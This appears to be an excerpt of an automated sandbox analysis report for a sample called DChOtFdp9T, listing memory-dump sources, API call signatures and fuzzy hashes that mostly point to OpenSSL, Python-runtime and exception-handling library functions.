                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debug$O_freeR_set_error$L_sk_findL_sk_pushO_malloc
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_ciph.c$SSL_COMP_add_compression_method
                                                                                                                                                                                                                            • API String ID: 672050802-2070406874
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassert$memcpy
                                                                                                                                                                                                                            • String ID: hs->curlen < BLOCK_SIZE$hs->curlen < BLOCK_SIZE$src/MD5.c$src/MD5.c
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error$O_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_clear
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_freeO_malloc
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$ssl_next_proto_validate$tls_parse_stoc_npn
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error$O_realloc
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$dane_mtype_set
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_freeY_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$tls_construct_cke_ecdhe
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: J_nid2snO_zallocP_get_digestbyname
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$dane_ctx_enable
                                                                                                                                                                                                                            • API String ID: 481619167-1287278166
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free$Y_free$L_sk_pop_freeO_clear_freeO_popmemset
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                            • API String ID: 4258461131-4238427508
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$D_bytes_exO_freeO_mallocR_set_debug
                                                                                                                                                                                                                            • String ID: $..\s\ssl\statem\statem_srvr.c$tls_construct_certificate_request
                                                                                                                                                                                                                            • API String ID: 2305228085-266924759
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error$D_lock_newO_freeO_zalloc
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_cert.c$ssl_cert_new
                                                                                                                                                                                                                            • API String ID: 1324884158-262037048
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_free$memcpy$L_cleanseO_mallocmemset
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                            • API String ID: 2649524955-4238427508
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_flagsO_set_dataO_set_initO_zallocR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\bio_ssl.c$ssl_new
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_mallocR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$P$U$[$`$tls_process_cert_status_body
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_freeO_strdup
                                                                                                                                                                                                                            • String ID: $..\s\ssl\s3_lib.c$ssl3_ctx_ctrl
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_sk_newL_sk_pushL_sk_sortO_freeO_mallocP_get_nameP_get_typeP_zlib
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_ciph.c
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_malloc$O_freeR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\ssl3_buffer.c$ssl3_setup_read_buffer$ssl3_setup_write_buffer
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Mem_$FreeSubtypeType_$DataErr_FromKindMallocMemoryReallocUnicode_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3719493655-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878605073.00007FFE0E141000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFE0E140000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e140000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878335285.00007FFE0E131000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FFE0E130000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e130000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfe0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878001785.00007FFE0CFB1000.00000020.00000001.01000000.0000002C.sdmp, Offset: 00007FFE0CFB0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfb0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878707402.00007FFE0E151000.00000020.00000001.01000000.00000027.sdmp, Offset: 00007FFE0E150000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e150000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878783464.00007FFE0E161000.00000020.00000001.01000000.00000026.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e160000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_mallocR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_client_hello_get1_extensions_present
                                                                                                                                                                                                                            • API String ID: 3444577743-3548336300
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF60299796B
                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF6029979EE
                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A0D
                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A1B
                                                                                                                                                                                                                            • FindClose.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A2C
                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A35
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                            • API String ID: 1057558799-766152087
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_strdupR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_use_psk_identity_hint
                                                                                                                                                                                                                            • API String ID: 598019968-3050056966
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_flagsO_freeO_get_dataO_get_initO_get_shutdownO_set_init
                                                                                                                                                                                                                            • String ID: ..\s\ssl\bio_ssl.c
                                                                                                                                                                                                                            • API String ID: 3531300166-4039210333
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4139299733-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_mallocR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\ssl3_buffer.c$ssl3_setup_write_buffer
                                                                                                                                                                                                                            • API String ID: 1940814937-2966149938
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free$R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_set_alpn_protos
                                                                                                                                                                                                                            • API String ID: 3271392029-878666718
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                            • Opcode ID: 9f6baad40be0772a1e05760420ea0be94be042065400a08498f8ed995d511e67
                                                                                                                                                                                                                            • Instruction ID: b3c8c0dcc5573f37e12b5d3b13e0f0639a4fc5203dfbe35ad54bfc16f106b6a8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6baad40be0772a1e05760420ea0be94be042065400a08498f8ed995d511e67
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F318372A08B818AEB608F65E8403ED7760FB88708F14403ADB4E87B95EF78C548C714
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_mallocR_newR_set_debugmemcpy
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_lib.c$construct_key_exchange_tbs
                                                                                                                                                                                                                            • API String ID: 3542074325-1491770217
                                                                                                                                                                                                                            • Opcode ID: 382c21de9810c2a45f695ad6f0ed9c596feb77d5d5a5215772df06e66ba482fb
                                                                                                                                                                                                                            • Instruction ID: 4fa9baf8a2d24e10f0016acee9838e1db5bb40dbff86a80f405572265ba9f798
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 382c21de9810c2a45f695ad6f0ed9c596feb77d5d5a5215772df06e66ba482fb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54218412F08B8192E705DB61D9116E96720FB99B80F849231DF6C87B9BEF3CE2918700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                            • Opcode ID: 5709618119bebde8496f8e644cc76075d364222d75f9466c7edde4c64b387a7a
                                                                                                                                                                                                                            • Instruction ID: 473e776ca4a0da1be46635b09a98adb17e9258ed79e37ce808dc9466ed9fa121
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5709618119bebde8496f8e644cc76075d364222d75f9466c7edde4c64b387a7a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44317332A18B8186EB64CF26E8402AE77A4FF89758F640135EA9D83B55DF7CD155CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CRYPTO_free.LIBCRYPTO-3(?,00000000,?,?,?,00007FFDFF2ABAFD), ref: 00007FFDFF2ABFB1
                                                                                                                                                                                                                            • CRYPTO_free.LIBCRYPTO-3(?,00000000,?,?,?,00007FFDFF2ABAFD), ref: 00007FFDFF2ABFC7
                                                                                                                                                                                                                            • CRYPTO_free.LIBCRYPTO-3(?,00000000,?,?,?,00007FFDFF2ABAFD), ref: 00007FFDFF2ABFDC
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF2AB660: CRYPTO_zalloc.LIBCRYPTO-3(?,00007FFDFF2AA9B8), ref: 00007FFDFF2AB69F
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF2AB660: ERR_new.LIBCRYPTO-3(?,00007FFDFF2AA9B8), ref: 00007FFDFF2AB6AC
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF2AB660: ERR_set_debug.LIBCRYPTO-3(?,00007FFDFF2AA9B8), ref: 00007FFDFF2AB6C4
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF2AB660: ERR_set_error.LIBCRYPTO-3(?,00007FFDFF2AA9B8), ref: 00007FFDFF2AB6D6
                                                                                                                                                                                                                            • CRYPTO_free.LIBCRYPTO-3(?,00000000,?,?,?,00007FFDFF2ABAFD), ref: 00007FFDFF2AC17D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free$O_zallocR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_dtls.c
                                                                                                                                                                                                                            • API String ID: 346603204-3140652063
                                                                                                                                                                                                                            • Opcode ID: 71f6cbb1c2990b51495ba8d6bc10df97e49dad027e0433a3f2efbc3e7baf2f98
                                                                                                                                                                                                                            • Instruction ID: 3689c86a171ff46091edf3bbeb63d3734bfc17b2b70f03e4bbdf021f3dca5d03
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71f6cbb1c2990b51495ba8d6bc10df97e49dad027e0433a3f2efbc3e7baf2f98
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78A1C263B08A8596DB24CB25D460ABD7760FB45784F444235EBADC7B9ADF3CE150CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_freeR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$tls_client_key_exchange_post_work
                                                                                                                                                                                                                            • API String ID: 868266018-2346923134
                                                                                                                                                                                                                            • Opcode ID: d910e7746db38f681d0cb92e740f6597433dc3cae2eef2a91c1af439d03e4ad7
                                                                                                                                                                                                                            • Instruction ID: bfe097fd4f8a55d79aa1c2fb30a45d55516f3bcd6c3095949f90b50454f0280d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d910e7746db38f681d0cb92e740f6597433dc3cae2eef2a91c1af439d03e4ad7
